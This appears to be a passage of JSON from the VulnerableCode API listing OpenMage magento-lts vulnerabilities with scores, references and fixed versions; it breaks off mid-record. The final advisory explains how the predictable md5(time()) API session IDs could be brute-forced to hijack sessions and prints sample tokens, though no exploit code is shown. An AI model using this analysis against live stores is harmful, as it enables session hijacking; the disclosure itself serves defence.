"http://public2.vulnerablecode.io/api/packages/58812?format=api", 
"purl": "pkg:composer/openmage/magento-lts@20.0.11", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-4tsg-n4v2-vyhg" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-9axm-6vqd-tkag" }, { "vulnerability": "VCID-9ztp-ffqs-4yh4" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-dg5g-wnuf-ryad" }, { "vulnerability": "VCID-dj3k-4q1f-xfbh" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-g75g-ab3s-y7db" }, { "vulnerability": "VCID-gewj-4tzh-k3e5" }, { "vulnerability": "VCID-gn12-464m-fkcu" }, { "vulnerability": "VCID-h9n9-9mxj-zqd6" }, { "vulnerability": "VCID-jfan-uqf5-3qhd" }, { "vulnerability": "VCID-kctp-3z8m-5fg2" }, { "vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-tqce-uume-myc2" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.0.11" }, { "url": "http://public2.vulnerablecode.io/api/packages/58829?format=api", "purl": "pkg:composer/openmage/magento-lts@20.0.13", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-4tsg-n4v2-vyhg" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-9axm-6vqd-tkag" }, { "vulnerability": "VCID-9ztp-ffqs-4yh4" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-dg5g-wnuf-ryad" }, { "vulnerability": "VCID-dj3k-4q1f-xfbh" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-g75g-ab3s-y7db" }, { "vulnerability": "VCID-gewj-4tzh-k3e5" }, { "vulnerability": "VCID-gn12-464m-fkcu" }, { "vulnerability": "VCID-h9n9-9mxj-zqd6" }, { "vulnerability": "VCID-jfan-uqf5-3qhd" }, { 
"vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-tqce-uume-myc2" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.0.13" } ], "aliases": [ "CVE-2021-32758", "GHSA-26rr-v2j2-25fh" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jr6u-gjtr-3udv" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/41381?format=api", "vulnerability_id": "VCID-kctp-3z8m-5fg2", "summary": "Improper Input Validation\nOpenMage magento-lts is an alternative to the Magento CE official releases. Due to missing sanitization in data flow in versions prior to 19.4.15 and 20.0.13, it was possible for admin users to upload arbitrary executable files to the server. OpenMage versions 19.4.15 and 20.0.13 have a patch for this issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-32759", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0055", "scoring_system": "epss", "scoring_elements": "0.68344", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.0055", "scoring_system": "epss", "scoring_elements": "0.68318", "published_at": "2026-06-04T12:55:00Z" }, { "value": "0.0055", "scoring_system": "epss", "scoring_elements": "0.6836", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.0055", "scoring_system": "epss", "scoring_elements": "0.68367", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-32759" }, { "reference_url": "https://github.com/OpenMage/magento-lts/commit/34709ac642d554aa1824892059186dd329db744b", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": 
"https://github.com/OpenMage/magento-lts/commit/34709ac642d554aa1824892059186dd329db744b" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v19.4.15", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v19.4.15" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.0.13", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.0.13" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32759", "reference_id": "CVE-2021-32759", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32759" }, { "reference_url": "https://github.com/advisories/GHSA-xm9f-vxmx-4m58", "reference_id": "GHSA-xm9f-vxmx-4m58", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-xm9f-vxmx-4m58" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-xm9f-vxmx-4m58", "reference_id": "GHSA-xm9f-vxmx-4m58", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-xm9f-vxmx-4m58" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/58829?format=api", "purl": "pkg:composer/openmage/magento-lts@20.0.13", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-4tsg-n4v2-vyhg" }, { "vulnerability": 
"VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-9axm-6vqd-tkag" }, { "vulnerability": "VCID-9ztp-ffqs-4yh4" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-dg5g-wnuf-ryad" }, { "vulnerability": "VCID-dj3k-4q1f-xfbh" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-g75g-ab3s-y7db" }, { "vulnerability": "VCID-gewj-4tzh-k3e5" }, { "vulnerability": "VCID-gn12-464m-fkcu" }, { "vulnerability": "VCID-h9n9-9mxj-zqd6" }, { "vulnerability": "VCID-jfan-uqf5-3qhd" }, { "vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-tqce-uume-myc2" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.0.13" } ], "aliases": [ "CVE-2021-32759", "GHSA-xm9f-vxmx-4m58" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-kctp-3z8m-5fg2" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/48322?format=api", "vulnerability_id": "VCID-mdd4-wk6v-a3cw", "summary": "OpenMage vulnerable to XSS in Admin Notifications\nOpenMage versions v20.15.0 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an admin with direct database access or the admin notification feed source to inject malicious scripts into vulnerable fields. 
Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-64174", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10306", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.1039", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10432", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10412", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-64174" }, { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://github.com/OpenMage/magento-lts/commit/9d604f5489851c54a96fca31b0e13c414b0fb20a", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-06T21:19:51Z/" } ], "url": "https://github.com/OpenMage/magento-lts/commit/9d604f5489851c54a96fca31b0e13c414b0fb20a" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64174", "reference_id": "CVE-2025-64174", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": 
"cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64174" }, { "reference_url": "https://github.com/advisories/GHSA-qv78-c8hc-438r", "reference_id": "GHSA-qv78-c8hc-438r", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-qv78-c8hc-438r" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-qv78-c8hc-438r", "reference_id": "GHSA-qv78-c8hc-438r", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "4.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-06T21:19:51Z/" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-qv78-c8hc-438r" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/71318?format=api", "purl": "pkg:composer/openmage/magento-lts@20.16.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.16.0" } ], "aliases": [ "CVE-2025-64174", "GHSA-qv78-c8hc-438r" ], "risk_score": 3.1, "exploitability": 
"0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-mdd4-wk6v-a3cw" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/53978?format=api", "vulnerability_id": "VCID-nv23-eun4-1fdd", "summary": "Unrestricted Upload of File with Dangerous Type\nOpenMage is a community-driven alternative to Magento CE. In OpenMage, an administrator with permission to import/export data and to edit cms pages was able to inject an executable file on the server via layout xml.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-26295", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00751", "scoring_system": "epss", "scoring_elements": "0.73522", "published_at": "2026-06-04T12:55:00Z" }, { "value": "0.00751", "scoring_system": "epss", "scoring_elements": "0.73559", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00751", "scoring_system": "epss", "scoring_elements": "0.73564", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00751", "scoring_system": "epss", "scoring_elements": "0.73551", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00751", "scoring_system": "epss", "scoring_elements": "0.73538", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-26295" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26295", "reference_id": "CVE-2020-26295", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26295" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/79588?format=api", "purl": "pkg:composer/openmage/magento-lts@20.0.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-4tsg-n4v2-vyhg" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-9axm-6vqd-tkag" }, { "vulnerability": 
"VCID-9tvj-q7kh-7faz" }, { "vulnerability": "VCID-9ztp-ffqs-4yh4" }, { "vulnerability": "VCID-b33e-r7rr-pyf7" }, { "vulnerability": "VCID-b7ua-zfks-fyg5" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-dg5g-wnuf-ryad" }, { "vulnerability": "VCID-dj3k-4q1f-xfbh" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-g75g-ab3s-y7db" }, { "vulnerability": "VCID-gewj-4tzh-k3e5" }, { "vulnerability": "VCID-gn12-464m-fkcu" }, { "vulnerability": "VCID-h9n9-9mxj-zqd6" }, { "vulnerability": "VCID-jfan-uqf5-3qhd" }, { "vulnerability": "VCID-jr6u-gjtr-3udv" }, { "vulnerability": "VCID-kctp-3z8m-5fg2" }, { "vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-tqce-uume-myc2" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.0.5" } ], "aliases": [ "CVE-2020-26295", "GHSA-52c6-6v3v-f3fg" ], "risk_score": null, "exploitability": "0.5", "weighted_severity": "0.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-nv23-eun4-1fdd" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/53747?format=api", "vulnerability_id": "VCID-pvcg-c61e-x3an", "summary": "Deserialization of Untrusted Data\nIn Magento (rubygems openmage/magento-lts package) before versions 19.4.8 and 20.0.4, an admin user can generate soap credentials that can be used to trigger RCE via PHP Object Injection through product attributes and a product. 
The issue is patched in versions 19.4.8 and 20.0.4.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-15244", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0087", "scoring_system": "epss", "scoring_elements": "0.75549", "published_at": "2026-06-04T12:55:00Z" }, { "value": "0.0087", "scoring_system": "epss", "scoring_elements": "0.75557", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.0087", "scoring_system": "epss", "scoring_elements": "0.7557", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.0087", "scoring_system": "epss", "scoring_elements": "0.7558", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.0087", "scoring_system": "epss", "scoring_elements": "0.75577", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-15244" }, { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://github.com/OpenMage/magento-lts/commit/26433d15b57978fcb7701b5f99efe8332ca8630b", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/commit/26433d15b57978fcb7701b5f99efe8332ca8630b" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15244", "reference_id": "CVE-2020-15244", "reference_type": "", "scores": [ { "value": "8.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": 
"generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15244" }, { "reference_url": "https://github.com/advisories/GHSA-jrgf-vfw2-hj26", "reference_id": "GHSA-jrgf-vfw2-hj26", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-jrgf-vfw2-hj26" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-jrgf-vfw2-hj26", "reference_id": "GHSA-jrgf-vfw2-hj26", "reference_type": "", "scores": [ { "value": "8.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-jrgf-vfw2-hj26" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/79036?format=api", "purl": "pkg:composer/openmage/magento-lts@20.0.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-4tsg-n4v2-vyhg" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-9axm-6vqd-tkag" }, { "vulnerability": "VCID-9tvj-q7kh-7faz" }, { "vulnerability": "VCID-9ztp-ffqs-4yh4" }, { "vulnerability": "VCID-b33e-r7rr-pyf7" }, { "vulnerability": "VCID-b7ua-zfks-fyg5" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-dg5g-wnuf-ryad" }, { "vulnerability": "VCID-dj3k-4q1f-xfbh" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-g75g-ab3s-y7db" }, { "vulnerability": "VCID-gewj-4tzh-k3e5" }, { "vulnerability": "VCID-gn12-464m-fkcu" }, { "vulnerability": "VCID-h9n9-9mxj-zqd6" }, { "vulnerability": "VCID-jfan-uqf5-3qhd" }, { "vulnerability": "VCID-jr6u-gjtr-3udv" }, { 
"vulnerability": "VCID-kctp-3z8m-5fg2" }, { "vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-nv23-eun4-1fdd" }, { "vulnerability": "VCID-tqce-uume-myc2" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" }, { "vulnerability": "VCID-zwm8-96yp-nben" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.0.4" } ], "aliases": [ "CVE-2020-15244", "GHSA-jrgf-vfw2-hj26" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-pvcg-c61e-x3an" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/44327?format=api", "vulnerability_id": "VCID-tqce-uume-myc2", "summary": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in openmage/magento-lts.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-41231", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00992", "scoring_system": "epss", "scoring_elements": "0.77275", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00992", "scoring_system": "epss", "scoring_elements": "0.77286", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00992", "scoring_system": "epss", "scoring_elements": "0.77276", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00992", "scoring_system": "epss", "scoring_elements": "0.77266", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00992", "scoring_system": "epss", "scoring_elements": "0.77245", "published_at": "2026-06-04T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-41231" }, { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": 
"HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://github.com/OpenMage/magento-lts/commit/d16fc6c5a1e66c6f0d9f82020f11702a7ddd78e4", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-03-10T20:58:15Z/" } ], "url": "https://github.com/OpenMage/magento-lts/commit/d16fc6c5a1e66c6f0d9f82020f11702a7ddd78e4" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v19.4.22", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-03-10T20:58:15Z/" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v19.4.22" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.0.19", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-03-10T20:58:15Z/" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.0.19" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41231", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": 
"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41231" }, { "reference_url": "https://github.com/advisories/GHSA-h632-p764-pjqm", "reference_id": "GHSA-h632-p764-pjqm", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-h632-p764-pjqm" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-h632-p764-pjqm", "reference_id": "GHSA-h632-p764-pjqm", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-03-10T20:58:15Z/" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-h632-p764-pjqm" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/63720?format=api", "purl": "pkg:composer/openmage/magento-lts@20.0.19", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-9axm-6vqd-tkag" }, { "vulnerability": "VCID-9ztp-ffqs-4yh4" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-dg5g-wnuf-ryad" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-h9n9-9mxj-zqd6" }, { "vulnerability": "VCID-jfan-uqf5-3qhd" }, { "vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": 
"http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.0.19" } ], "aliases": [ "CVE-2021-41231", "GHSA-h632-p764-pjqm", "GMS-2023-157" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-tqce-uume-myc2" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/92784?format=api", "vulnerability_id": "VCID-upex-64ca-uqbf", "summary": "Magento LTS has Weak API Session ID — Predictable MD5 of Time-Derived Inputs\nAffected Version: OpenMage LTS ≤ 20.16.0 (confirmed on `20.16.0`)\n\nAffected File: `https://github.com/OpenMage/magento-lts/blob/main/app/code/core/Mage/Api/Model/Session.php` – `start()` method\n\n\n## Summary\n\nThe XML-RPC / SOAP API session ID is generated using an outdated, time-based construction rather than a Cryptographically Secure Pseudo-Random Number Generator (CSPRNG):\n\n```php\n$this->_currentSessId = md5(time() . uniqid('', true) . $sessionName);\n```\nAll inputs to the MD5 hash are time-derived and non-secure:\n\n| Input | Value | Predictability |\n|----------------------------|---------------------------------------------------|----------------------------------------|\n| `time()` | Unix timestamp (seconds) | Fully predictable |\n| `uniqid('', true) prefix` | `sprintf('%08x%05x', $sec, $usec/10)` | Highly predictable via network timing |\n| `uniqid('', true) suffix` | `php_combined_lcg()` decimal float | Process-state dependent (`getpid() ^ time()`) |\n| `$sessionName` | `null` (empty) — called without arg | Constant |\n\nBecause the resulting digest relies entirely on the timestamp and the PHP internal LCG state, the effective entropy is severely constrained. This violates the OWASP ASVS v4 requirement of ≥ 64 bits of entropy (V3.2.2) and NIST SP 800-63B standards. 
By narrowing the LCG window (via server state leaks or general predictability) and leveraging the lack of API rate-limiting, an attacker can generate a localized pool of candidate MD5 hashes and execute a high-speed online brute-force attack to hijack active API sessions.\n\n\n\n## Technical Analysis\n\n### Code Path\n\n```\nPOST /api/xmlrpc/ → login(username, apiKey)\n → Mage_Api_Model_Session::login()\n → $session->init('api', 'api')\n → Mage_Api_Model_Session::init($namespace='api', $sessionName='api')\n # $sessionName is NOT forwarded to start()\n → Mage_Api_Model_Session::start() ← NO $sessionName argument\n # $sessionName = null inside start()\n $this->_currentSessId = md5(time() . uniqid('', true) . null)\n\n```\n\nNote: `init()` receives `$sessionName='api'` but invokes `$this->start()` without forwarding it, meaning the effective construction is strictly `md5(time() . uniqid('', true))`.\n\n## Live Evidence\nFive consecutive XML-RPC login tokens were collected from a live OpenMage 20.16.0 container, all generated within a single Unix second (`unix_sec= 1775817593`):\n```\nSample 1: 6a302397f17e48845d0f9aba377f3dc3 (usec ≈ 464631)\nSample 2: 39b4ec42bd3c389312e500690daeb349 (usec ≈ 497215)\nSample 3: 527662d79f7fb499597a82d80d170a88 (usec ≈ 535175)\nSample 4: e5d6f7a8906a03ea7af99d92be11b5b2 (usec ≈ 568838)\nSample 5: 